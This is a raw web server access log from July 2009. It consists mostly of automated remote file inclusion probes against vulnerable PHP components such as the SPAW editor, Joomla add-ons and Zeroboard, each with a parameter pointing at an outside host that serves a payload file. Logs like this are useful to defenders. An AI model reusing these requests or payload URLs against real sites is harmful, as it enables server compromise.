211.189.18.73 - - [18/Jul/2009:04:52:52 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:52:52 -0400] "GET /logs/access_log.Q109062500/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:52:52 -0400] "GET /logs/access_log.Q109062500/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
114.200.199.144 - - [18/Jul/2009:04:53:19 -0400] "GET /logs/access_log.Q109051400%20%20/index.php?cont=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:53:51 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.189.18.73 - - [18/Jul/2009:04:53:51 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.189.18.73 - - [18/Jul/2009:04:53:51 -0400] "GET /logs/access_log.Q109051200/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
218.146.231.194 - - [18/Jul/2009:04:54:37 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:54:37 -0400] "GET /logs/access_log.Q109062200%20%20/index.php?cont=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.146.231.194 - - [18/Jul/2009:04:54:37 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.146.231.194 - - [18/Jul/2009:04:54:37 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.146.231.194 - - [18/Jul/2009:04:54:37 -0400] "GET /logs/access_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:54:39 -0400] "GET /logs/access_log.Q109051200%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:54:39 -0400] "GET /logs/error_log.Q109051200%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:54:39 -0400] "GET /logs/access_log.Q109051200%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:54:39 -0400] "GET /logs/error_log.Q109051200%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:04:54:49 -0400] "GET /logs/access_log.Q109062500/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
114.200.199.144 - - [18/Jul/2009:04:56:02 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:56:03 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:56:03 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:56:08 -0400] "GET /logs/access_log.Q109071000/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
65.23.158.226 - - [18/Jul/2009:04:56:13 -0400] "GET /logs//atom.php5?page=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:04:56:13 -0400] "GET //atom.php5?page=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:04:56:13 -0400] "GET /logs/error_log.Q109052300//atom.php5?page=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:04:56:26 -0400] "GET /logs/access_log.Q109070600//atom.php5?page=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
209.59.12.99 - - [18/Jul/2009:04:57:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [18/Jul/2009:04:59:11 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:59:22 -0400] "GET /logs/access_log.Q109071000%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:00:07 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:00:07 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:00:07 -0400] "GET /logs/error_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:00:27 -0400] "GET /logs/access_log.Q109071500//admin/editor2/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 262 "-" "libwww-perl/5.825"
213.149.105.8 - - [18/Jul/2009:05:00:44 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:05:00:44 -0400] "GET //skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:05:00:44 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:05:00:44 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:00:55 -0400] "GET /logs/access_log.Q109062200/index.php?cont=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:01:29 -0400] "GET /logs/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:01:29 -0400] "GET /errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:01:30 -0400] "GET /errors.php?error=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:01:30 -0400] "GET /logs/errors.php?error=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:01:30 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:01:30 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:05:01:40 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:05:01:40 -0400] "GET //?_zb_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:05:01:40 -0400] "GET /logs//?_zb_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 200 9999 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:05:01:50 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:01:53 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:01:56 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:05:02:09 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.146.231.194 - - [18/Jul/2009:05:02:27 -0400] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.146.231.194 - - [18/Jul/2009:05:02:28 -0400] "GET /logs/access_log.Q109051400%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:03:22 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
206.225.23.4 - - [18/Jul/2009:05:03:38 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:03:40 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:03:45 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:03:48 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:05:05:06 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:05:05:06 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:05:05:06 -0400] "GET //skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:05:05:17 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.38.136.251 - - [18/Jul/2009:05:06:13 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:06:13 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 251 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:06:13 -0400] "GET /logs/access_log.Q109071100%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
83.96.135.55 - - [18/Jul/2009:05:06:26 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:06:26 -0400] "GET //skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:06:26 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:06:31 -0400] "GET /logs/access_log.Q109062800%20%20//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:09:06 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:05:09:06 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:09:13 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:09:13 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:09:13 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.6.8.110 - - [18/Jul/2009:05:09:58 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.110 - - [18/Jul/2009:05:09:58 -0400] "GET /logs/error_log.Q109060800 HTTP/1.0" 200 2993021 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.110 - - [18/Jul/2009:05:10:00 -0400] "GET /logs/error_log.Q109060800 HTTP/1.0" 200 2993021 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.192 - - [18/Jul/2009:05:11:01 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:05:11:01 -0400] "GET /logs/access_log.Q109052800//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:05:11:01 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:05:11:10 -0400] "GET /logs/access_log.Q109052600//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:11:22 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:11:22 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:11:22 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:11:28 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:11:28 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:11:28 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:11:40 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:12:01 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:05:12:05 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
59.125.5.1 - - [18/Jul/2009:05:12:09 -0400] "GET /logs/access_log.Q109050800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.125.5.1 - - [18/Jul/2009:05:12:09 -0400] "GET /logs/access_log.Q109062200%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.125.5.1 - - [18/Jul/2009:05:12:09 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
59.125.5.1 - - [18/Jul/2009:05:12:10 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:12:58 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:12:58 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:12:59 -0400] "GET /logs/access_log.Q109071000/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:05:13:00 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.158.98.196 - - [18/Jul/2009:05:14:34 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.durgana.de/calendar/images/wing.gif??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
218.158.98.196 - - [18/Jul/2009:05:14:34 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.durgana.de/calendar/images/wing.gif??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
218.158.98.196 - - [18/Jul/2009:05:14:34 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.durgana.de/calendar/images/wing.gif??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
218.158.98.196 - - [18/Jul/2009:05:14:34 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.durgana.de/calendar/images/wing.gif??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
211.189.18.73 - - [18/Jul/2009:05:14:36 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:05:14:36 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:05:14:36 -0400] "GET /logs/access_log.Q109062500%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
59.125.5.1 - - [18/Jul/2009:05:14:57 -0400] "GET /logs/access_log.Q109062200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.251 - - [18/Jul/2009:05:15:02 -0400] "GET /logs/access_log.Q109070800///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:15:02 -0400] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:15:02 -0400] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:15:05 -0400] "GET /logs/access_log.Q109060100///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
83.96.135.55 - - [18/Jul/2009:05:15:11 -0400] "GET /logs/access_log.Q109051400//adminhead.php?path[docroot]=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:15:11 -0400] "GET /logs//adminhead.php?path[docroot]=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 217 "-" "libwww-perl/5.825"
83.96.135.55 - - [18/Jul/2009:05:15:11 -0400] "GET //adminhead.php?path[docroot]=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.825"
218.38.136.251 - - [18/Jul/2009:05:15:17 -0400] "GET /logs/access_log.Q109051400///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:15:17 -0400] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:05:15:17 -0400] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
211.189.18.73 - - [18/Jul/2009:05:15:19 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:05:15:19 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
